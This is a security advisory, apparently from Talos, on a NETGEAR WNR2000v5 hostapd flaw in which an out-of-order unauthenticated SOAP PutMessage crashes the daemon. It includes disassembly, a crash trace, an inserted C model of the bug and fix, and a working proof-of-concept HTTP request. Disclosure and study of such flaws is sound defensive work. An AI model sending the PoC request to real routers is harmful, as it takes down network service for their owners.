Talos Intelligence
TALOS-2019-0832

NETGEAR N300 WNR2000v5 unauthenticated host access point daemon denial-of-service vulnerability

Published 2019-09-09
www.talosintelligence.com

CVSS2: 5.0 Medium
AV:N/AC:L/Au:N/C:N/I:N/A:P
(Attack Vector: Network, Attack Complexity: Low, Authentication: None, Confidentiality Impact: None, Integrity Impact: None, Availability Impact: Partial)

CVSS3: 7.5 High
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
(Attack Vector: Network, Attack Complexity: Low, Privileges Required: None, User Interaction: None, Scope: Unchanged, Confidentiality Impact: None, Integrity Impact: None, Availability Impact: High)

EPSS: 0.002 Low (percentile 59.1%)

Summary

An exploitable denial-of-service vulnerability exists in the Host Access Point Daemon (hostapd) on the NETGEAR N300 (WNR2000v5) wireless router. A SOAP request sent in an invalid sequence to the <WFAWLANConfig:1#PutMessage> service can cause a null pointer dereference, resulting in the hostapd service crashing. An unauthenticated attacker can send a specially-crafted SOAP request to trigger this vulnerability.

Tested Versions

NETGEAR N300 WNR2000v5 Firmware Version V1.0.0.70

Product URLs

https://www.netgear.com/support/product/WNR2000v5

CVSSv3 Score

7.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-476: NULL Pointer Dereference

Details

The NETGEAR N300 is a small, affordable wireless router with minimal features.

When a specific SOAP request is sent to the UPnP web interface served by the hostapd daemon (TCP port 49152 in the proof of concept below), web_connection_check_data() calls wps_process_msg() with a NULL first argument under certain conditions.

   0x44e5d4 <web_connection_check_data+2372>: lw   a0,20(s1)   // a0 = struct pointer loaded from s1+0x14 (NULL in the crash)
   0x44e5d8 <web_connection_check_data+2376>: move a1,zero     // a1 = op_code 0 (WSC_UPnP in hostapd's enum wsc_op_code)
=> 0x44e5dc <web_connection_check_data+2380>: jalr t9          // call wps_process_msg()
   0x44e5e0 <web_connection_check_data+2384>: move a2,v0       // branch delay slot: a2 = decoded message buffer

The problem is that there is no check that the WPS session state has been set up before an incoming message is processed. That setup normally happens when the external registrar calls the GetDeviceInfo() method, which makes the access point build its M1 message and allocate the per-session structure:

POST /wps_control HTTP/1.1
SOAPAction: "urn:schemas-wifialliance-org:service:WFAWLANConfig:1#GetDeviceInfo"
Content-type: text/xml
Content-Length: 320

<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body>.<m:GetDeviceInfo xmlns:m="urn:schemas-wifialliance-org:service:WFAWLANConfig:1">.</m:GetDeviceInfo></SOAP-ENV:Body></SOAP-ENV:Envelope>

This method populates the structure that is later passed to wps_process_msg(). If no client has called GetDeviceInfo() since the daemon started, that pointer is still NULL, and hostapd crashes as soon as wps_process_msg() dereferences it:

  0044e5d4     lw                  a0,0x14(s1)         // $a0 == 0x00
  0044e5d8     clear               a1
  0044e5dc     jalr                t9=>wps_process_msg
  0044e5e0     _move               a2,v0
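The request-ordering bug above, modelled in C as an added illustration (this is not hostapd code and not part of the Talos advisory). The types and handlers here, upnp_iface, wps_data, handle_get_device_info(), handle_put_message_unchecked(), handle_put_message_checked() and wps_process_msg_model(), are hypothetical stand-ins for the real hostapd structures; the "AAAA" payload is the constructed body from the proof of concept. The unchecked handler reproduces the shape of the bug (it trusts that GetDeviceInfo already ran), the checked handler shows the fix a maintainer would apply (refuse PutMessage until the session exists):

```c
/*
 * Added example (hypothetical model, not hostapd source): PutMessage sent
 * before GetDeviceInfo reaches wps_process_msg() with a NULL session pointer.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Per-session WPS state; in hostapd, wps_process_msg() takes a struct wps_data *. */
struct wps_data {
    int initialized;
    int msg_count;
};

/* One UPnP-exposed interface. peer_wps stays NULL until GetDeviceInfo runs
 * (the pointer the crash dump shows as 0x0 in $a0). */
struct upnp_iface {
    struct wps_data *peer_wps;
};

enum http_status { HTTP_OK = 200, HTTP_BAD_REQUEST = 400, HTTP_INTERNAL_SERVER_ERROR = 500 };

/* GetDeviceInfo: the AP builds M1 and allocates the session state. */
static int handle_get_device_info(struct upnp_iface *iface)
{
    if (iface->peer_wps == NULL) {
        iface->peer_wps = calloc(1, sizeof(*iface->peer_wps));
        if (iface->peer_wps == NULL)
            return HTTP_INTERNAL_SERVER_ERROR;
        iface->peer_wps->initialized = 1;
    }
    return HTTP_OK;
}

/* Stand-in for wps_process_msg(): dereferences wps unconditionally, as the real one does. */
static int wps_process_msg_model(struct wps_data *wps, const char *msg, size_t len)
{
    wps->msg_count++;   /* with wps == NULL this is the SIGSEGV from the advisory */
    return (msg != NULL && len > 0) ? HTTP_OK : HTTP_BAD_REQUEST;
}

/* Vulnerable shape: assumes GetDeviceInfo already populated peer_wps. */
static int handle_put_message_unchecked(struct upnp_iface *iface, const char *msg, size_t len)
{
    return wps_process_msg_model(iface->peer_wps, msg, len);
}

/* Hardened shape: an out-of-order PutMessage has no session to act on, so reject it. */
static int handle_put_message_checked(struct upnp_iface *iface, const char *msg, size_t len)
{
    if (iface->peer_wps == NULL)
        return HTTP_INTERNAL_SERVER_ERROR;
    return wps_process_msg_model(iface->peer_wps, msg, len);
}

/* Extract the method name after '#' from a SOAPAction header value such as
 * "urn:schemas-wifialliance-org:service:WFAWLANConfig:1#PutMessage" (quotes allowed). */
static int soap_method(const char *soapaction, char *out, size_t outlen)
{
    const char *hash = strrchr(soapaction, '#');
    size_t n;
    if (hash == NULL)
        return -1;
    hash++;
    n = strcspn(hash, "\"");   /* stop at the closing quote, if present */
    if (n == 0 || n >= outlen)
        return -1;
    memcpy(out, hash, n);
    out[n] = '\0';
    return 0;
}

/* Dispatch one request; `checked` selects the hardened PutMessage handler. */
static int dispatch(struct upnp_iface *iface, const char *soapaction,
                    const char *body, size_t len, int checked)
{
    char method[32];
    if (soap_method(soapaction, method, sizeof method) != 0)
        return HTTP_BAD_REQUEST;
    if (strcmp(method, "GetDeviceInfo") == 0)
        return handle_get_device_info(iface);
    if (strcmp(method, "PutMessage") == 0)
        return checked ? handle_put_message_checked(iface, body, len)
                       : handle_put_message_unchecked(iface, body, len);
    return HTTP_BAD_REQUEST;
}

/* Replay a sequence of SOAPAction values against a freshly started daemon; return the last status. */
static int run_sequence(const char *const *actions, size_t n, int checked)
{
    struct upnp_iface iface = { NULL };
    int status = HTTP_BAD_REQUEST;
    for (size_t i = 0; i < n; i++)
        status = dispatch(&iface, actions[i], "AAAA", 4, checked);   /* constructed PoC body */
    free(iface.peer_wps);
    return status;
}

/* The advisory's trigger: PutMessage as the first request after daemon start. */
static int poc_out_of_order(int checked)
{
    static const char *const seq[] = {
        "\"urn:schemas-wifialliance-org:service:WFAWLANConfig:1#PutMessage\""
    };
    return run_sequence(seq, 1, checked);
}

/* The intended registrar flow: GetDeviceInfo (M1) first, then PutMessage. */
static int poc_in_order(int checked)
{
    static const char *const seq[] = {
        "\"urn:schemas-wifialliance-org:service:WFAWLANConfig:1#GetDeviceInfo\"",
        "\"urn:schemas-wifialliance-org:service:WFAWLANConfig:1#PutMessage\""
    };
    return run_sequence(seq, 2, checked);
}

int main(void)
{
    printf("PutMessage first, checked handler:    HTTP %d\n", poc_out_of_order(1));
    printf("GetDeviceInfo then PutMessage, fixed: HTTP %d\n", poc_in_order(1));
    printf("GetDeviceInfo then PutMessage, vuln:  HTTP %d\n", poc_in_order(0));
    /* poc_out_of_order(0) would dereference NULL, reproducing the advisory's SIGSEGV. */
    return 0;
}
```

The point the model makes is that the fix belongs in the PutMessage handler, not in wps_process_msg(): the daemon has to treat request ordering as attacker-controlled state and answer an out-of-order PutMessage with an error rather than assume the registrar was well behaved.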

Crash Information

Program received signal SIGSEGV, Segmentation fault.
0x0043cc7c in ?? ()

   0x43cc70 <wps_get_msg+24>:	lw	t9,-31756(gp)
   0x43cc74 <wps_get_msg+28>:	jr	t9
   0x43cc78 <wps_get_msg+32>:	nop
=> 0x43cc7c <wps_process_msg>:	lw	v0,4(a0)          // Crash: a0 == NULL
   0x43cc80 <wps_process_msg+4>:	lui	gp,0x49
   0x43cc84 <wps_process_msg+8>:	beqz	v0,0x43cc94 <wps_process_msg+24>
   0x43cc88 <wps_process_msg+12>:	addiu	gp,gp,6416
   0x43cc8c <wps_process_msg+16>:	b	0x43cc98 <wps_process_msg+28>
   0x43cc90 <wps_process_msg+20>:	lw	t9,-30984(gp)


peda-mips > x/32xw $a0
0x0:	Cannot access memory at address 0x0

peda-mips > bt
#0  0x0043cc7c in wps_process_msg ()
#1  0x0044e5e4 in web_connection_check_data ()
#2  0x004515fc in httpread_read_handler ()
#3  0x00421ff8 in eloop_sock_table_dispatch ()
#4  0x004226ec in eloop_run ()
#5  0x00408068 in main ()

Exploit Proof of Concept

# Send to <router_ip>:49152
POST /wps_control HTTP/1.1
SOAPAction: "urn:schemas-wifialliance-org:service:WFAWLANConfig:1#PutMessage"
Host: 192.168.1.1:49152
Content-Type: text/xml
Content-Length: 357

<?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
.<m:PutMessage xmlns:m="urn:schemas-wifialliance-org:service:WFAWLANConfig:1">
<NewInMessage>AAAA</NewInMessage>
.</m:PutMessage>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>

Timeline

2019-05-08 - Vendor Disclosure
2019-09-09 - Public Release
